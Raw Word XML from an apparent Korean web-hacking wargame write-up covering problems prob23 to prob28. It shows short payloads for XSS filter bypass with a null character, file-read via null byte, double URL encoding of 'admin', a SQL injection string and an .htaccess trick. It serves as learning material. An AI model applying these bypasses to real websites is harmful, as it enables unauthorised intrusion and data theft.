          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>dmin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>의 암호화된 패스워드를 찾았다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E70BD" w:rsidRDefault="005E70BD" w:rsidP="00516200">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EFD7FBD" wp14:editId="1FC70768">
            <wp:extent cx="3819525" cy="723900"/>
            <wp:effectExtent l="0" t="0" r="9525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D" w:rsidRDefault="005E70BD" w:rsidP="00516200">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>alt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">값인 </w:t>
      </w:r>
      <w:r>
        <w:t>zombi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e를 빼면 f</w:t>
      </w:r>
      <w:r>
        <w:t>lag is rainbow</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1C45" w:rsidRPr="007A1C45" w:rsidRDefault="007A1C45" w:rsidP="007A1C45">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A1C45">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="007A1C45">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob23</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A1C45" w:rsidRDefault="00221413" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B650802" wp14:editId="4E451426">
            <wp:extent cx="2733675" cy="990600"/>
            <wp:effectExtent l="0" t="0" r="9525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13" w:rsidRDefault="00221413" w:rsidP="007A1C45">
      <w:r>
        <w:t>&lt;script&gt;alert(1);&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 넣으면 성공이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00221413" w:rsidRDefault="00221413" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F4CF36C" wp14:editId="6C3F1CF8">
            <wp:extent cx="2800350" cy="1419225"/>
            <wp:effectExtent l="0" t="0" r="0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13" w:rsidRDefault="00221413" w:rsidP="007A1C45">
      <w:r>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 필터링 하고 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B139C7" w:rsidRDefault="00B139C7" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 이용한 우회</w:t>
      </w:r>
      <w:r>
        <w:t>, URL encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 이용한 우회로도 뚫리지 않아</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>생각해보았더니</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B139C7" w:rsidRDefault="002B2971" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7AAA6F1F" wp14:editId="0B6EDD49">
            <wp:extent cx="4124325" cy="3876675"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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71" w:rsidRDefault="002B2971" w:rsidP="007A1C45">
      <w:r>
        <w:t>NULL character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 이용하여 </w:t>
      </w:r>
      <w:r w:rsidR="0048524A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>우회할 수 있었습니다.</w:t>
      </w:r>
      <w:r w:rsidR="0048524A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0048524A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="0048524A">
        <w:t>E, Chrome</w:t>
      </w:r>
      <w:r w:rsidR="0048524A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에서 X</w:t>
      </w:r>
      <w:r w:rsidR="0048524A">
        <w:t>SS</w:t>
      </w:r>
      <w:r w:rsidR="0048524A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">을 막아 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0048524A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="0048524A">
        <w:t>ireFox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0048524A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 진행함.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048524A" w:rsidRPr="0048524A" w:rsidRDefault="0048524A" w:rsidP="0048524A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048524A">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>prob24</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048524A" w:rsidRDefault="0048524A" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06993605" wp14:editId="584B4405">
            <wp:extent cx="5731510" cy="641350"/>
            <wp:effectExtent l="0" t="0" r="2540" b="635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33B8" wp14:editId="1581DCCE">
            <wp:extent cx="5731510" cy="1983740"/>
            <wp:effectExtent l="0" t="0" r="2540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4A" w:rsidRDefault="0048524A" w:rsidP="007A1C45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확인 해 보았다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0048524A" w:rsidRDefault="0048524A" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3661F599" wp14:editId="17B1550C">
            <wp:extent cx="5731510" cy="3782695"/>
            <wp:effectExtent l="0" t="0" r="2540" b="825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4A" w:rsidRDefault="00A4490A" w:rsidP="007A1C45"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에서 </w:t>
      </w:r>
      <w:r>
        <w:t>12, 7. 0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>.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없애고 </w:t>
      </w:r>
      <w:r>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이면 문제가 풀린다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A4490A" w:rsidRDefault="00A4490A" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4764E0C7" wp14:editId="4E322B48">
            <wp:extent cx="5210175" cy="1381125"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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0A" w:rsidRDefault="00CB211A" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58EB41E4" wp14:editId="07FC2751">
            <wp:extent cx="4972050" cy="1762125"/>
            <wp:effectExtent l="0" t="0" r="0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1A" w:rsidRPr="00CB211A" w:rsidRDefault="00CB211A" w:rsidP="00CB211A">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB211A">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB211A">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob25</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CB211A" w:rsidRDefault="00085BEA" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5E093A24" wp14:editId="2B77463D">
            <wp:extent cx="5731510" cy="2114550"/>
            <wp:effectExtent l="0" t="0" r="2540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EA" w:rsidRDefault="00085BEA" w:rsidP="007A1C45">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>assword.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 읽으면 성공인 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>듯 싶다</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461BD3" w:rsidRDefault="00461BD3" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0EDEF967" wp14:editId="2DE23B67">
            <wp:extent cx="857250" cy="504825"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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3" w:rsidRDefault="00461BD3" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t>ile=hello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했을 때 </w:t>
      </w:r>
      <w:r>
        <w:t>hello.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 읽으므로 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>password.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 넣으면 </w:t>
      </w:r>
      <w:r>
        <w:t>password.php.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 읽는다고 볼 수 있다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그러므로 </w:t>
      </w:r>
      <w:r>
        <w:t>NULL character</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 이용하여 문제를 풀면 된다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461BD3" w:rsidRDefault="00461BD3" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48D58603" wp14:editId="321AE5BC">
            <wp:extent cx="5731510" cy="1325245"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255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3" w:rsidRPr="00461BD3" w:rsidRDefault="00461BD3" w:rsidP="00461BD3">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00461BD3">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00461BD3">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob26</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00461BD3" w:rsidRDefault="00461BD3" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E0F58A0" wp14:editId="5097826D">
            <wp:extent cx="866775" cy="400050"/>
            <wp:effectExtent l="0" t="0" r="9525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14" w:rsidRDefault="00DB7A14" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26B9D860" wp14:editId="59CDCBAE">
            <wp:extent cx="3295650" cy="3819525"/>
            <wp:effectExtent l="0" t="0" r="0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14" w:rsidRDefault="00392763" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">브라우저와 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">간의 </w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">인자 교환에는 </w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:t xml:space="preserve">URL encode, decode </w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">과정이 포함된다. 브라우저에서 </w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:t>encode</w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 하여 </w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 보내고 </w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:t>php</w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">는 그것을 </w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:t>decode</w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>한다.</w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">때문에 </w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:t>encode</w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 두 번 해주면 </w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:t>decode</w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">하여 </w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="00AA522D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>이 나올 것이다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA522D" w:rsidRDefault="00AA522D" w:rsidP="007A1C45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</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">encoding </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">하면 </w:t>
      </w:r>
      <w:r>
        <w:t>%61%64%6d%69%6e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA522D" w:rsidRDefault="00AA522D" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">여기에 한번 더 </w:t>
      </w:r>
      <w:r>
        <w:t>encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 하려면 </w:t>
      </w:r>
      <w:r>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를 붙여주면 되므로</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA522D">
        <w:t>%2561%2564%256d%2569%256e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA522D" w:rsidRDefault="00AA522D" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BF7B414" wp14:editId="677425B9">
            <wp:extent cx="4000500" cy="2333625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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D" w:rsidRPr="00AA522D" w:rsidRDefault="00AA522D" w:rsidP="00AA522D">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA522D">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA522D">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>rob27</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AA522D" w:rsidRDefault="00AA522D" w:rsidP="007A1C45">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EBBD794" wp14:editId="32DDD041">
            <wp:extent cx="2114550" cy="904875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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2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3CE80" wp14:editId="4D7B638B">
            <wp:extent cx="5731510" cy="2869565"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985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D" w:rsidRDefault="00571B1D" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">대충 보면 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘, like, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공백,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> order by, group by, or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 사용해서 하면 될 것 같습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F86919" w:rsidRDefault="00F86919" w:rsidP="007A1C45">
      <w:r w:rsidRPr="00F86919">
        <w:t>no=0) or 1 like 1--%20</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 구문으로</w:t>
      </w:r>
      <w:r w:rsidR="004918FE">
        <w:t xml:space="preserve"> where </w:t>
      </w:r>
      <w:r w:rsidR="004918FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">절을 </w:t>
      </w:r>
      <w:r w:rsidR="004918FE">
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidR="004918FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">로 만들어 모든 값을 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004918FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>빼온</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004918FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 후 </w:t>
      </w:r>
      <w:r w:rsidR="004918FE">
        <w:t>order by</w:t>
      </w:r>
      <w:r w:rsidR="004918FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 a</w:t>
      </w:r>
      <w:r w:rsidR="004918FE">
        <w:t>dmin</w:t>
      </w:r>
      <w:r w:rsidR="004918FE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 위로 올리겠습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004918FE" w:rsidRDefault="004918FE" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65438A8E" wp14:editId="061987F1">
            <wp:extent cx="5731510" cy="1240790"/>
            <wp:effectExtent l="0" t="0" r="254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>
      <w:r w:rsidRPr="004918FE">
        <w:t>no=0) or 1 like 1--%20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> order by id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004918FE" w:rsidRDefault="004918FE" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2424B6C8" wp14:editId="5C89F083">
            <wp:extent cx="5731510" cy="3690620"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="25815E5F" wp14:editId="0B5A11FB">
            <wp:extent cx="4895850" cy="1790700"/>
            <wp:effectExtent l="0" t="0" r="0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/>
    <w:p w:rsidR="004918FE" w:rsidRDefault="004918FE" w:rsidP="007A1C45"/>
    <w:p w:rsidR="004918FE" w:rsidRDefault="004918FE" w:rsidP="007A1C45"/>
    <w:p w:rsidR="004918FE" w:rsidRDefault="004918FE" w:rsidP="007A1C45"/>
    <w:p w:rsidR="004918FE" w:rsidRPr="004918FE" w:rsidRDefault="004918FE" w:rsidP="004918FE">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004918FE">
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>prob28</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004918FE" w:rsidRDefault="00B11C0A" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30A4F9EF" wp14:editId="776FC551">
            <wp:extent cx="2705100" cy="1905000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0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0A" w:rsidRDefault="005A0902" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F530946" wp14:editId="4C112E88">
            <wp:extent cx="5731510" cy="744220"/>
            <wp:effectExtent l="0" t="0" r="254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02" w:rsidRDefault="005A0902" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>파일을 넣어봤더니 위와 같이 뜬다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A0902" w:rsidRDefault="005A0902" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F338BEB" wp14:editId="19902D8D">
            <wp:extent cx="657225" cy="333375"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525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힌트를 읽어봤더니 자기를 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>읽어달라고</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A0902" w:rsidRDefault="00423F79" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">힌트에 써 있는 것을 보아 하니 </w:t>
      </w:r>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">가 어떤 조건으로 </w:t>
      </w:r>
      <w:r>
        <w:t>readme</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>만 출력되게 하는 것 같다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00423F79" w:rsidRDefault="00423F79" w:rsidP="007A1C45">
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로 p</w:t>
      </w:r>
      <w:r>
        <w:t>hp engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>을 끌 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00423F79" w:rsidRDefault="00423F79" w:rsidP="007A1C45">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
